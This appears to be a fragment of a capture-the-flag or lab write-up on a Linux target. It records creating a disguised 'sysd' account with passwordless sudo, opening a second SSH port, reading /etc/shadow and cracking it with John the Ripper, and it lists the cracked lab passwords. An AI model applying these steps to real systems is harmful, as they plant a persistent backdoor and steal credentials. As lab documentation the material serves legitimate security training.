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q81oow8a3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adduser --no-create-home sysd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pentester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-u 225 sysd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groupmod -g 225 sysd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225 sysd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under # User privilege specification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sysd ALL=(ALL:ALL) NOPASSWD:ALL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sudo -l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less /etc/shadow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sudo nano /etc/ssh/sshd_config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Change #Port 22 to (remove the # and add a second line):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2222 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systemctl restart sshd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 (then enter password pentester)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su root (found flag_7)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 (enter password pentester)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su root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John /etc/shadow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Passwords came back as: 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computer (stallman)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freedom (babbage)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trustno1 (mitnik)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dragon (lovelace)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lakers (turing)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passw0rd (sysadmin)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Goodluck! (student)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(John crashed before getting the last password cracked and I kept getting the error message “Crash recovery file is locked: /root/.john/john.rec.” But the last password is pentester for sysd, which is the account I created and set the password.)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